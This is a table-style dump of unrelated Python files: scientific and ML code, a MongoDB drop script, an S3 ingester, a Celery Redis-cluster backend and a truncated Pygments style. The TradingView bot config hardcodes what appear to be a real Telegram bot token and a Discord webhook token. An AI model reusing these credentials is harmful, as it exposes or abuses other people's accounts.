ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b4102e5d87481ffee07f75e6ffccb663e0faf5fd | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "MovingAverage", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 0, ar_order = 12); |
py | b4102e8edea7d4593769dedac3ad42261569f112 | # -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
"""Autogenerated file - DO NOT EDIT
If you spot a bug, please report it on the mailing list and/or change the generator."""
from nipype.interfaces.base import CommandLine, CommandLineInputSpec, SEMLikeCommandLine, TraitedSpec, File, Directory, traits, isdefined, InputMultiPath, OutputMultiPath
import os
class N4ITKBiasFieldCorrectionInputSpec(CommandLineInputSpec):
inputimage = File(desc="Input image where you observe signal inhomegeneity", exists=True, argstr="--inputimage %s")
maskimage = File(desc="Binary mask that defines the structure of your interest. NOTE: This parameter is OPTIONAL. If the mask is not specified, the module will use internally Otsu thresholding to define this mask. Better processing results can often be obtained when a meaningful mask is defined.", exists=True, argstr="--maskimage %s")
outputimage = traits.Either(traits.Bool, File(), hash_files=False, desc="Result of processing", argstr="--outputimage %s")
outputbiasfield = traits.Either(traits.Bool, File(), hash_files=False, desc="Recovered bias field (OPTIONAL)", argstr="--outputbiasfield %s")
iterations = InputMultiPath(traits.Int, desc="Maximum number of iterations at each level of resolution. Larger values will increase execution time, but may lead to better results.", sep=",", argstr="--iterations %s")
convergencethreshold = traits.Float(desc="Stopping criterion for the iterative bias estimation. Larger values will lead to smaller execution time.", argstr="--convergencethreshold %f")
meshresolution = InputMultiPath(traits.Float, desc="Resolution of the initial bspline grid defined as a sequence of three numbers. The actual resolution will be defined by adding the bspline order (default is 3) to the resolution in each dimension specified here. For example, 1,1,1 will result in a 4x4x4 grid of control points. This parameter may need to be adjusted based on your input image. In the multi-resolution N4 framework, the resolution of the bspline grid at subsequent iterations will be doubled. The number of resolutions is implicitly defined by Number of iterations parameter (the size of this list is the number of resolutions)", sep=",", argstr="--meshresolution %s")
splinedistance = traits.Float(desc="An alternative means to define the spline grid, by setting the distance between the control points. This parameter is used only if the grid resolution is not specified.", argstr="--splinedistance %f")
shrinkfactor = traits.Int(desc="Defines how much the image should be upsampled before estimating the inhomogeneity field. Increase if you want to reduce the execution time. 1 corresponds to the original resolution. Larger values will significantly reduce the computation time.", argstr="--shrinkfactor %d")
bsplineorder = traits.Int(desc="Order of B-spline used in the approximation. Larger values will lead to longer execution times, may result in overfitting and poor result.", argstr="--bsplineorder %d")
weightimage = File(desc="Weight Image", exists=True, argstr="--weightimage %s")
histogramsharpening = InputMultiPath(traits.Float, desc="A vector of up to three values. Non-zero values correspond to Bias Field Full Width at Half Maximum, Wiener filter noise, and Number of histogram bins.", sep=",", argstr="--histogramsharpening %s")
class N4ITKBiasFieldCorrectionOutputSpec(TraitedSpec):
outputimage = File(desc="Result of processing", exists=True)
outputbiasfield = File(desc="Recovered bias field (OPTIONAL)", exists=True)
class N4ITKBiasFieldCorrection(SEMLikeCommandLine):
"""title: N4ITK MRI Bias correction
category: Filtering
description: Performs image bias correction using N4 algorithm. This module is based on the ITK filters contributed in the following publication: Tustison N, Gee J "N4ITK: Nick's N3 ITK Implementation For MRI Bias Field Correction", The Insight Journal 2009 January-June, http://hdl.handle.net/10380/3053
version: 9
documentation-url: http://wiki.slicer.org/slicerWiki/index.php/Documentation/4.1/Modules/N4ITKBiasFieldCorrection
contributor: Nick Tustison (UPenn), Andrey Fedorov (SPL, BWH), Ron Kikinis (SPL, BWH)
acknowledgements: The development of this module was partially supported by NIH grants R01 AA016748-01, R01 CA111288 and U01 CA151261 as well as by NA-MIC, NAC, NCIGT and the Slicer community.
"""
input_spec = N4ITKBiasFieldCorrectionInputSpec
output_spec = N4ITKBiasFieldCorrectionOutputSpec
_cmd = "N4ITKBiasFieldCorrection "
_outputs_filenames = {'outputimage': 'outputimage.nii', 'outputbiasfield': 'outputbiasfield.nii'}
|
py | b4102f739ab0982775634b415124b1136fa35294 | # /usr/bin/env python
from numpy import (zeros, ones, finfo, inf, argmax)
from scipy.sparse.linalg import (norm, lsqr)
from scipy.sparse._sparsetools import (csr_matvec, csc_matvec)
def sparse_nnls(C, d, tol=-1, itmax_factor=3):
""" Calculate argmin ||Cx - d||_2 subject to x >= 0 when C is sparse
Parameters are:
C is a scipy.sparse matrix of size m by n
d is an ndarray of size m or scipy.sparse matrix of size m by 1
tol: tolerance (optional)
itmax_factor: factor to determine maximum iterations allowed (optional)
Returns:
x: an ndarray that minimizes ||Cx - d||_2 subject to x >= 0
"""
C = C.tocsc()
# Set the tolerance
m, n = C.shape
tol = 10 * finfo(float).eps * norm(C, 1) * (max(C.shape) + 1) if tol == -1 else tol
itmax = itmax_factor * n
# Initialize vector of n zeros and Infs (to be used later)
wz = zeros(n)
# Initialize set of non-active columns to null
P = zeros(n, dtype=bool)
# Initialize set of active columns to all and the initial point to zeros
Z = ones(n, dtype=bool)
x = zeros(n)
Ctrans = C.T # transpose c
dtemp = d # copy of d
# resid = d - C*x
resid = -dtemp
csc_matvec(m, n, C.indptr, C.indices, C.data, x, resid)
resid = -resid
# w = Ctrans*resid
w = zeros(n)
csr_matvec(n, m, Ctrans.indptr, Ctrans.indices, Ctrans.data, resid, w)
# Set up iteration criteria
outeriter = 0
i = 0
# Outer loop to put variables into set to hold positive coefficients
while any(Z) and any(w[Z] > tol):
# print(f"On iteration {outeriter}\n")
outeriter += 1
# Reset intermediate solution z
z = zeros(n)
# Create wz, a Lagrange multiplier vector of variables in the zero set.
# wz must have the same size as w to preserve the correct indices, so
# set multipliers to -Inf for variables outside of the zero set.
wz[P] = -inf
wz[Z] = w[Z]
# Find variable with largest Lagrange multiplier
t = argmax(wz)
# Move variable t from zero set to positive set
P[t] = True
Z[t] = False
# Compute intermediate solution using only variables in positive set
z[P] = lsqr(C[:, [i for i, e in enumerate(P) if e]], d)[0]
# inner loop to remove elements from the positive set which no longer belong
while any(z[P] <= 0):
# print("Entering inner loop\n")
i += 1
if i > itmax:
print("sparse_nnls:IterationCountExceeded")
x = z
return x
# Find indices where intermediate solution z is approximately negative
Q = (z <= 0) & P
# Choose new x subject to keeping new x nonnegative
alpha = min(x[Q] / (x[Q] - z[Q]))
x = x + alpha * (z - x)
# Reset Z and P given intermediate values of x
Z = ((abs(x) < tol) & P) | Z
P = ~Z
z = zeros(n) # Reset z
z[P] = lsqr(C[:, [i for i, e in enumerate(P) if e]], d)[0] # Re-solve for z
x = z
# resid = d - C*x
resid = -dtemp
csc_matvec(m, n, C.indptr, C.indices, C.data, x, resid)
resid = -resid
# w = Ctrans*resid
w = zeros(n)
csr_matvec(n, m, Ctrans.indptr, Ctrans.indices, Ctrans.data, resid, w)
return x
|
py | b4102f8153bfdfdada145061f06b4803577b5415 | #! /usr/bin/python
# -*- encoding: utf-8 -*-
# Adapted from https://github.com/wujiyang/Face_Pytorch (Apache License)
import torch
import torch.nn as nn
import torch.nn.functional as F
import time, pdb, numpy, math
from utils import accuracy
class LossFunction(nn.Module):
def __init__(self, nOut, nClasses, margin=0.3, scale=15, easy_margin=False, **kwargs):
super(LossFunction, self).__init__()
self.test_normalize = True
self.m = margin
self.s = scale
self.in_feats = nOut
self.weight = torch.nn.Parameter(torch.FloatTensor(nClasses, nOut), requires_grad=True)
self.ce = nn.CrossEntropyLoss()
nn.init.xavier_normal_(self.weight, gain=1)
self.easy_margin = easy_margin
self.cos_m = math.cos(self.m)
self.sin_m = math.sin(self.m)
# make the function cos(theta+m) monotonic decreasing while theta in [0°,180°]
self.th = math.cos(math.pi - self.m)
self.mm = math.sin(math.pi - self.m) * self.m
print('Initialised AAMSoftmax margin %.3f scale %.3f'%(self.m,self.s))
def forward(self, x, label=None):
assert x.size()[0] == label.size()[0]
assert x.size()[1] == self.in_feats
# cos(theta)
cosine = F.linear(F.normalize(x), F.normalize(self.weight))
# cos(theta + m)
sine = torch.sqrt((1.0 - torch.mul(cosine, cosine)).clamp(0, 1))
phi = cosine * self.cos_m - sine * self.sin_m
if self.easy_margin:
phi = torch.where(cosine > 0, phi, cosine)
else:
phi = torch.where((cosine - self.th) > 0, phi, cosine - self.mm)
#one_hot = torch.zeros(cosine.size(), device='cuda' if torch.cuda.is_available() else 'cpu')
one_hot = torch.zeros_like(cosine)
one_hot.scatter_(1, label.view(-1, 1), 1)
output = (one_hot * phi) + ((1.0 - one_hot) * cosine)
output = output * self.s
loss = self.ce(output, label)
prec1 = accuracy(output.detach(), label.detach(), topk=(1,))[0]
return loss, prec1 |
py | b4102fff3d62752199a90314e215c2579fa87daa | class DynamicSearchException(Exception):
"""
Base exception for the app.
"""
|
py | b4103069085a1f4bd3f6da6094da4a57a24c1744 | from pymongo import MongoClient
import json
with open('auth.json') as f:
auth_info = json.load(f)
mongoInfo = auth_info['mongo']
client = MongoClient('mongodb+srv://' + mongoInfo['username'] + ':' + mongoInfo['password'] + mongoInfo['server'] + '/tweets')
db = client['tweets']
db['tweets'].drop() |
py | b4103079840afea6ef491d944bfd2411efd95cb8 | # ----------------------------------------------- #
# Plugin Name : TradingView-Webhook-Bot #
# Author Name : fabston #
# File Name : config.py #
# ----------------------------------------------- #
# TradingView Example Alert Message:
# {
# "key":"9T2q394M90", "telegram":"-1001298977502", "discord":"789842349670960670/BFeBBrCt-w2Z9RJ2wlH6TWUjM5bJuC29aJaJ5OQv9sE6zCKY_AlOxxFwRURkgEl852s3", "msg":"Long #{{ticker}} at `{{close}}`"
# }
sec_key = (
"9T2q394M90" # Can be anything. Has to match with "key" in your TradingView alert message
)
# Telegram Settings
send_telegram_alerts = True
tg_token = "5120063835:AAEGneHSMn0t8MvDZeJqKlAwk_P4gDIQi6w" # Bot token. Get it from @Botfather
channel = -1649898601 # Channel ID (ex. -1001487568087)
# Discord Settings
send_discord_alerts = False
discord_webhook = "" # Discord Webhook URL (https://support.discordapp.com/hc/de/articles/228383668-Webhooks-verwenden)
# Slack Settings
send_slack_alerts = False
slack_webhook = "" # Slack Webhook URL (https://api.slack.com/messaging/webhooks)
# Twitter Settings
send_twitter_alerts = False
tw_ckey = ""
tw_csecret = ""
tw_atoken = ""
tw_asecret = ""
# Email Settings
send_email_alerts = False
email_sender = "" # Your email address
email_receivers = ["", ""] # Receivers, can be multiple
email_subject = "Trade Alert!"
email_port = 465 # SMTP SSL Port (ex. 465)
email_host = "" # SMTP host (ex. smtp.gmail.com)
email_user = "" # SMTP Login credentials
email_password = "" # SMTP Login credentials
|
py | b41030d95ea913d049366e1a7b2b490646a644a7 | # Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Iterable, Optional, Union
from albumentations import BboxParams, KeypointParams
from albumentations.augmentations.transforms import Crop as CropAlb
from fastestimator.op.numpyop.multivariate.multivariate import MultiVariateAlbumentation
from fastestimator.util.traceability_util import traceable
@traceable()
class Crop(MultiVariateAlbumentation):
"""Crop a region from the input.
Args:
mode: What mode(s) to execute this Op in. For example, "train", "eval", "test", or "infer". To execute
regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument
like "!infer" or "!train".
ds_id: What dataset id(s) to execute this Op in. To execute regardless of ds_id, pass None. To execute in all
ds_ids except for a particular one, you can pass an argument like "!ds1".
image_in: The key of an image to be modified.
mask_in: The key of a mask to be modified (with the same random factors as the image).
masks_in: The key of masks to be modified (with the same random factors as the image).
bbox_in: The key of a bounding box(es) to be modified (with the same random factors as the image).
keypoints_in: The key of keypoints to be modified (with the same random factors as the image).
image_out: The key to write the modified image (defaults to `image_in` if None).
mask_out: The key to write the modified mask (defaults to `mask_in` if None).
masks_out: The key to write the modified masks (defaults to `masks_in` if None).
bbox_out: The key to write the modified bounding box(es) (defaults to `bbox_in` if None).
keypoints_out: The key to write the modified keypoints (defaults to `keypoints_in` if None).
bbox_params: Parameters defining the type of bounding box ('coco', 'pascal_voc', 'albumentations' or 'yolo').
keypoint_params: Parameters defining the type of keypoints ('xy', 'yx', 'xya', 'xys', 'xyas', 'xysa').
x_min: Minimum upper left x coordinate.
y_min: Minimum upper left y coordinate.
x_max: Maximum lower right x coordinate.
y_max: Maximum lower right y coordinate.
Image types:
uint8, float32
"""
def __init__(self,
x_min: int = 0,
y_min: int = 0,
x_max: int = 1024,
y_max: int = 1024,
mode: Union[None, str, Iterable[str]] = None,
ds_id: Union[None, str, Iterable[str]] = None,
image_in: Optional[str] = None,
mask_in: Optional[str] = None,
masks_in: Optional[str] = None,
bbox_in: Optional[str] = None,
keypoints_in: Optional[str] = None,
image_out: Optional[str] = None,
mask_out: Optional[str] = None,
masks_out: Optional[str] = None,
bbox_out: Optional[str] = None,
keypoints_out: Optional[str] = None,
bbox_params: Union[BboxParams, str, None] = None,
keypoint_params: Union[KeypointParams, str, None] = None):
super().__init__(CropAlb(x_min=x_min, y_min=y_min, x_max=x_max, y_max=y_max, always_apply=True),
image_in=image_in,
mask_in=mask_in,
masks_in=masks_in,
bbox_in=bbox_in,
keypoints_in=keypoints_in,
image_out=image_out,
mask_out=mask_out,
masks_out=masks_out,
bbox_out=bbox_out,
keypoints_out=keypoints_out,
bbox_params=bbox_params,
keypoint_params=keypoint_params,
mode=mode,
ds_id=ds_id)
|
py | b41030e6ff11886ce80f2ab2a6ebd40020d41daa | import sys
from simplecoremidi import MIDISource
from musi import play, countdown
try:
input = __builtins__.raw_input
except AttributeError:
pass
def main(args):
if not args[1:]:
print "Usage runner.py <song.py>"
return 1
mod = args[1]
m = __import__(mod, globals(), locals(), ['x'])
source = MIDISource("musi emitter")
send_midi = source.send
countdown()
while True:
m = reload(m)
song = m.song
print "Playing."
try:
play(song, send_midi)
except KeyboardInterrupt:
print "Interrupted. Hit enter."
input()
if __name__=='__main__':
sys.exit(main(sys.argv))
|
py | b4103169967f7d0d2663bab34d648e2cc87e6c6e | import multiprocessing
import re
from typing import Generator, Optional
import boto3
import botocore
import djclick as click
from . import _data_helper as helper
def _iter_matching_objects(
s3_client,
bucket: str,
prefix: str,
include_regex: str,
exclude_regex: str,
) -> Generator[dict, None, None]:
paginator = s3_client.get_paginator('list_objects_v2')
page_iter = paginator.paginate(Bucket=bucket, Prefix=prefix)
include_pattern = re.compile(include_regex)
exclude_pattern = re.compile(exclude_regex)
for page in page_iter:
for obj in page['Contents']:
if include_pattern.match(obj['Key']) and not exclude_pattern.search(obj['Key']):
yield obj
class Loader:
def __init__(self, bucket: str, region: str, google: bool = False):
self.bucket = bucket
self.google = google
self.region = region
def _format_url(self, base_url):
if self.google:
return f'http://storage.googleapis.com/{base_url}'
return f'https://{self.region}.amazonaws.com/{base_url}'
def load_object(self, obj: dict) -> None:
key = obj['Key']
url = self._format_url(f'{self.bucket}/{key}')
helper._get_or_create_checksum_file_url(url, name=key)
@click.command()
@click.argument('bucket')
@click.option('--include-regex', default='')
@click.option('--exclude-regex', default='')
@click.option('--prefix', default='')
@click.option('--region', default='us-east-1')
@click.option('--access-key-id')
@click.option('--secret-access-key')
@click.option('--google', is_flag=True, default=False)
def ingest_s3(
bucket: str,
include_regex: str,
exclude_regex: str,
prefix: str,
region: str,
access_key_id: Optional[str],
secret_access_key: Optional[str],
google: bool,
) -> None:
if access_key_id and secret_access_key:
boto3_params = {
'aws_access_key_id': access_key_id,
'aws_secret_access_key': secret_access_key,
'config': botocore.client.Config(signature_version='s3v4', region_name=region),
}
else:
boto3_params = {
'config': botocore.client.Config(
signature_version=botocore.UNSIGNED, region_name=region
)
}
if google: # Google Cloud Storage
boto3_params['endpoint_url'] = 'https://storage.googleapis.com'
s3_client = boto3.client('s3', **boto3_params)
loader = Loader(bucket, region, google=google)
pool = multiprocessing.Pool(multiprocessing.cpu_count())
pool.map(
loader.load_object,
_iter_matching_objects(s3_client, bucket, prefix, include_regex, exclude_regex),
)
|
py | b41031c08476cf8f7aff25809ca677c95d3ae196 | from .context_manager import nullcontext
from .raise_error import raise_if_kwargs
from .tqdm import tqdm
from .context_manager import nullcontext
from .progbar import Progbar
from .misc import *
from .logger import setup_logger, get_logger
from .timeout import TimeOut
|
py | b4103243d8ad8ea9d93b6e47ed460637a2f97cb3 | from api.extensions import db, ma
from api.models.Projects import Project
from api.models.ProjectMembers import ProjectMember
from api.models.Team import Team
from api.models.User import User
from api.serializers.user import UserSchema
from api.serializers.project import ProjectSchema
from api.serializers.team import TeamSchema
user_schema = UserSchema()
users_schema = UserSchema(many=True)
project_schema = ProjectSchema()
team_schema = TeamSchema()
def to_json(user):
"""
Returns a user JSON object
"""
user_detail = user_schema.dump(user).data
data = get_data(user_detail["id"])
user_detail["all_teams"] = data["all_teams"]
user_detail["all_projects"] = data["all_projects"]
return user_detail
def find_by_email(email):
"""
query user on their email
"""
return User.query.filter_by(email=email).first()
def find_by_user_id(_id):
"""
query user on their id
"""
user = User.query.filter_by(id=_id).first()
return user_schema.dump(user).data
def find_by_username(username):
"""
query user on their username
"""
user = User.query.filter_by(username=username).first()
return user_schema.dump(user).data
def delete_by_id(_id):
"""
Delete user by their id
"""
User.query.filter_by(id=_id).delete()
db.session.commit()
def delete_by_email(email):
"""
Delete user by their email
"""
User.query.filter_by(email=email).delete()
db.session.commit()
def update_by_id(user_id, data):
"""
update user by its id
"""
user = User.query.get(user_id)
user.username = data['username']
db.session.commit()
return user_schema.dump(user).data
def get_data(user_id):
"""
get all the projects and the teams of a user
"""
all_projects = []
all_teams = []
queries = db.session.query(
User, ProjectMember, Team, Project
).join(
ProjectMember, User.id == ProjectMember.user_id
).join(
Team, ProjectMember.team_id == Team.id
).join(
Project, Team.project_id == Project.id
).filter(
User.id == user_id
)
for project in queries:
all_projects.append(project_schema.dump(project.Project).data)
for team in queries:
all_teams.append(team_schema.dump(team.Team).data)
return {"all_projects": all_projects,
"all_teams": all_teams}
def get_user_roles(user_id, project_id):
"""
get all the roles of a user in a project
"""
all_roles = []
queries = db.session.query(
User, ProjectMember, Team, Project
).join(
ProjectMember, User.id == ProjectMember.user_id
).join(
Team, ProjectMember.team_id == Team.id
).join(
Project, Team.project_id == Project.id
).filter(
User.id == user_id,
Project.id == project_id
)
for team in queries:
all_roles.append(team_schema.dump(team.Team).data["role"])
return all_roles
def get_teams_of_user_in_project(user_id, project_id):
"""
get all the teams of the user in a project
"""
all_team_ids = []
queries = db.session.query(
User, ProjectMember, Team, Project
).join(
ProjectMember, User.id == ProjectMember.user_id
).join(
Team, ProjectMember.team_id == Team.id
).join(
Project, Team.project_id == Project.id
).filter(
User.id == user_id,
Project.id == project_id
)
for team in queries:
all_team_ids.append(team_schema.dump(team.Team).data["id"])
return all_team_ids
def get_projectmembers(project_id):
"""
get the project members of a project
"""
all_members = []
queries = db.session.query(
Project, Team, ProjectMember, User
).join(
Team, Project.id == Team.project_id
).join(
ProjectMember, Team.id == ProjectMember.team_id
).join(
User, ProjectMember.user_id == User.id
).filter(
Project.id == project_id
)
for member in queries:
team_id = team_schema.dump(member.Team).data["id"]
team_role = team_schema.dump(member.Team).data["role"]
team_name = team_schema.dump(member.Team).data["team_name"]
project_id = team_schema.dump(member.Team).data["project_id"]
name = user_schema.dump(member.User).data["name"]
email = user_schema.dump(member.User).data["email"]
data = {
"team_id": team_id,
"team_role": team_role,
"team_name": team_name,
"project_id": project_id,
"name": name,
"email": email
}
all_members.append(data)
return all_members
def save(user):
"""
Save a user to the database.
This includes creating a new user and editing one.
"""
db.session.add(user)
db.session.commit()
user_detail = user_schema.dump(user).data
data = get_data(user_detail["id"])
user_detail["all_teams"] = data["all_teams"]
user_detail["all_projects"] = data["all_projects"]
return user_detail
def search_user(email_query):
"""
search user on their email
"""
search = "%{}%".format(email_query)
users = User.query.filter(User.email.like(search)).all()
return users_schema.dump(users).data |
py | b41034f224577793dde0c1916d9c08f90cc42dc5 | # -*- coding: utf-8 -*-
"""
celery.backends.rediscluster
~~~~~~~~~~~~~~~~~~~~~
Redis cluster result store backend.
CELERY_REDIS_CLUSTER_BACKEND_SETTINGS = {
startup_nodes: [{"host": "127.0.0.1", "port": "6379"}]
}
"""
from __future__ import absolute_import
from functools import partial
from kombu.utils import cached_property, retry_over_time
from celery import states
from celery.canvas import maybe_signature
from celery.exceptions import ChordError, ImproperlyConfigured
from celery.utils.serialization import strtobool
from celery.utils.log import get_logger
from celery.utils.time import humanize_seconds
from celery.backends.base import KeyValueStoreBackend
# try:
from rediscluster.client import RedisCluster
# from kombu.transport.redis import get_redis_error_classes
# except ImportError: # pragma: no cover
# RedisCluster = None # noqa
# ConnectionError = None # noqa
get_redis_error_classes = None # noqa
__all__ = ['RedisClusterBackend']
REDIS_MISSING = """\
You need to install the redis-py-cluster library in order to use \
the Redis result store backend."""
logger = get_logger(__name__)
error = logger.error
class RedisClusterBackend(KeyValueStoreBackend):
"""Redis task result store."""
#: redis client module.
redis = RedisCluster
startup_nodes = None
max_connections = None
init_slot_cache = True
supports_autoexpire = True
supports_native_join = True
implements_incr = True
def __init__(self, *args, **kwargs):
super(RedisClusterBackend, self).__init__(expires_type=int, **kwargs)
conf = self.app.conf
if self.redis is None:
raise ImproperlyConfigured(REDIS_MISSING)
# For compatibility with the old REDIS_* configuration keys.
def _get(key):
for prefix in 'CELERY_REDIS_{0}', 'REDIS_{0}':
try:
return conf[prefix.format(key)]
except KeyError:
pass
self.conn_params = self.app.conf.get('CELERY_REDIS_CLUSTER_SETTINGS', {
'startup_nodes': [{'host': _get('HOST') or 'localhost', 'port': _get('PORT') or 6379}]
})
if self.conn_params is not None:
if not isinstance(self.conn_params, dict):
raise ImproperlyConfigured(
'RedisCluster backend settings should be grouped in a dict')
try:
new_join = strtobool(self.conn_params.pop('new_join'))
if new_join:
self.apply_chord = self._new_chord_apply
self.on_chord_part_return = self._new_chord_return
except KeyError:
pass
self.expires = self.prepare_expires(None, type=int)
self.connection_errors, self.channel_errors = (
get_redis_error_classes() if get_redis_error_classes
else ((), ()))
def get(self, key):
return self.client.get(key)
def mget(self, keys):
return self.client.mget(keys)
def ensure(self, fun, args, **policy):
retry_policy = dict(self.retry_policy, **policy)
max_retries = retry_policy.get('max_retries')
return retry_over_time(
fun, self.connection_errors, args, {},
partial(self.on_connection_error, max_retries),
**retry_policy
)
def on_connection_error(self, max_retries, exc, intervals, retries):
tts = next(intervals)
error('Connection to Redis lost: Retry (%s/%s) %s.',
retries, max_retries or 'Inf',
humanize_seconds(tts, 'in '))
return tts
def set(self, key, value, **retry_policy):
return self.ensure(self._set, (key, value), **retry_policy)
def _set(self, key, value):
if hasattr(self, 'expires'):
self.client.setex(key, value, self.expires)
else:
self.client.set(key, value)
def delete(self, key):
self.client.delete(key)
def incr(self, key):
return self.client.incr(key)
def expire(self, key, value):
return self.client.expire(key, value)
def add_to_chord(self, group_id, result):
self.client.incr(self.get_key_for_group(group_id, '.t'), 1)
def _unpack_chord_result(self, tup, decode,
EXCEPTION_STATES=states.EXCEPTION_STATES,
PROPAGATE_STATES=states.PROPAGATE_STATES):
_, tid, state, retval = decode(tup)
if state in EXCEPTION_STATES:
retval = self.exception_to_python(retval)
if state in PROPAGATE_STATES:
raise ChordError('Dependency {0} raised {1!r}'.format(tid, retval))
return retval
def _new_chord_apply(self, header, partial_args, group_id, body,
result=None, options={}, **kwargs):
# avoids saving the group in the redis db.
options['task_id'] = group_id
return header(*partial_args, **options or {})
def _new_chord_return(self, task, state, result, propagate=None,
PROPAGATE_STATES=states.PROPAGATE_STATES):
app = self.app
if propagate is None:
propagate = self.app.conf.CELERY_CHORD_PROPAGATES
request = task.request
tid, gid = request.id, request.group
if not gid or not tid:
return
client = self.client
jkey = self.get_key_for_group(gid, '.j')
tkey = self.get_key_for_group(gid, '.t')
result = self.encode_result(result, state)
_, readycount, totaldiff, _, _ = client.pipeline() \
.rpush(jkey, self.encode([1, tid, state, result])) \
.llen(jkey) \
.get(tkey) \
.expire(jkey, 86400) \
.expire(tkey, 86400) \
.execute()
totaldiff = int(totaldiff or 0)
try:
callback = maybe_signature(request.chord, app=app)
total = callback['chord_size'] + totaldiff
if readycount == total:
decode, unpack = self.decode, self._unpack_chord_result
resl, _, _ = client.pipeline() \
.lrange(jkey, 0, total) \
.delete(jkey) \
.delete(tkey) \
.execute()
try:
callback.delay([unpack(tup, decode) for tup in resl])
except Exception as exc:
error('Chord callback for %r raised: %r',
request.group, exc, exc_info=1)
app._tasks[callback.task].backend.fail_from_current_stack(
callback.id,
exc=ChordError('Callback error: {0!r}'.format(exc)),
)
except ChordError as exc:
error('Chord %r raised: %r', request.group, exc, exc_info=1)
app._tasks[callback.task].backend.fail_from_current_stack(
callback.id, exc=exc,
)
except Exception as exc:
error('Chord %r raised: %r', request.group, exc, exc_info=1)
app._tasks[callback.task].backend.fail_from_current_stack(
callback.id, exc=ChordError('Join error: {0!r}'.format(exc)),
)
@cached_property
def client(self):
return RedisCluster(**self.conn_params)
def __reduce__(self, args=(), kwargs={}):
return super(RedisClusterBackend, self).__reduce__(
(self.conn_params['startup_nodes'], ), {'expires': self.expires},
)
if __name__ == '__main__':
from celery import Celery
class Config:
CELERY_ENABLE_UTC = True
CELERY_TIMEZONE = 'Europe/Istanbul'
CELERY_REDIS_CLUSTER_SETTINGS = {'startup_nodes': [
{"host": "195.175.249.97", "port": "6379"},
{"host": "195.175.249.98", "port": "6379"},
{"host": "195.175.249.99", "port": "6380"}
]}
app = Celery()
app.config_from_object(Config)
rb = RedisClusterBackend(app=app)
rb.set('a', 'b1')
print(rb.get('a'))
|
py | b410362334cf83f51a3576c2d184f114183694a5 | # -*- coding: utf-8 -*-
"""
pygments.styles.paraiso_light
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Paraíso (Light) by Jan T. Sott
Pygments template by Jan T. Sott (https://github.com/idleberg)
Created with Base16 Builder by Chris Kempson
(https://github.com/chriskempson/base16-builder).
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
BACKGROUND = "#e7e9db"
CURRENT_LINE = "#b9b6b0"
SELECTION = "#a39e9b"
FOREGROUND = "#2f1e2e"
COMMENT = "#8d8687"
RED = "#ef6155"
ORANGE = "#f99b15"
YELLOW = "#fec418"
GREEN = "#48b685"
AQUA = "#5bc4bf"
BLUE = "#06b6ef"
PURPLE = "#815ba4"
class ParaisoLightStyle(Style):
default_style = ''
background_color = BACKGROUND
highlight_color = SELECTION
background_color = BACKGROUND
highlight_color = SELECTION
styles = {
# No corresponding class for the following:
Text: FOREGROUND, # class: ''
Whitespace: "", # class: 'w'
Error: RED, # class: 'err'
Other: "", # class 'x'
Comment: COMMENT, # class: 'c'
Comment.Multiline: "", # class: 'cm'
Comment.Preproc: "", # class: 'cp'
Comment.Single: "", # class: 'c1'
Comment.Special: "", # class: 'cs'
Keyword: PURPLE, # class: 'k'
Keyword.Constant: "", # class: 'kc'
Keyword.Declaration: "", # class: 'kd'
Keyword.Namespace: AQUA, # class: 'kn'
Keyword.Pseudo: "", # class: 'kp'
Keyword.Reserved: "", # class: 'kr'
Keyword.Type: YELLOW, # class: 'kt'
Operator: AQUA, # class: 'o'
Operator.Word: "", # class: 'ow' - like keywords
Punctuation: FOREGROUND, # class: 'p'
Name: FOREGROUND, # class: 'n'
Name.Attribute: BLUE, # class: 'na' - to be revised
Name.Builtin: "", # class: 'nb'
Name.Builtin.Pseudo: "", # class: 'bp'
Name.Class: YELLOW, # class: 'nc' - to be revised
Name.Constant: RED, # class: 'no' - to be revised
Name.Decorator: AQUA, # class: 'nd' - to be revised
Name.Entity: "", # class: 'ni'
Name.Exception: RED, # class: 'ne'
Name.Function: BLUE, # class: 'nf'
Name.Property: "", # class: 'py'
Name.Label: "", # class: 'nl'
Name.Namespace: YELLOW, # class: 'nn' - to be revised
Name.Other: BLUE, # class: 'nx'
Name.Tag: AQUA, # class: 'nt' - like a keyword
Name.Variable: RED, # class: 'nv' - to be revised
Name.Variable.Class: "", # class: 'vc' - to be revised
Name.Variable.Global: "", # class: 'vg' - to be revised
Name.Variable.Instance: "", # class: 'vi' - to be revised
Number: ORANGE, # class: 'm'
Number.Float: "", # class: 'mf'
Number.Hex: "", # class: 'mh'
Number.Integer: "", # class: 'mi'
Number.Integer.Long: "", # class: 'il'
Number.Oct: "", # class: 'mo'
Literal: ORANGE, # class: 'l'
Literal.Date: GREEN, # class: 'ld'
String: GREEN, # class: 's'
String.Backtick: "", # class: 'sb'
String.Char: FOREGROUND, # class: 'sc'
String.Doc: COMMENT, # class: 'sd' - like a comment
String.Double: "", # class: 's2'
String.Escape: ORANGE, # class: 'se'
String.Heredoc: "", # class: 'sh'
String.Interpol: ORANGE, # class: 'si'
String.Other: "", # class: 'sx'
String.Regex: "", # class: 'sr'
String.Single: "", # class: 's1'
String.Symbol: "", # class: 'ss'
Generic: "", # class: 'g'
Generic.Deleted: RED, # class: 'gd',
Generic.Emph: "italic", # class: 'ge'
Generic.Error: "", # class: 'gr'
Generic.Heading: "bold " + FOREGROUND, # class: 'gh'
Generic.Inserted: GREEN, # class: 'gi'
Generic.Output: "", # class: 'go'
Generic.Prompt: "bold " + COMMENT, # class: 'gp'
Generic.Strong: "bold", # class: 'gs'
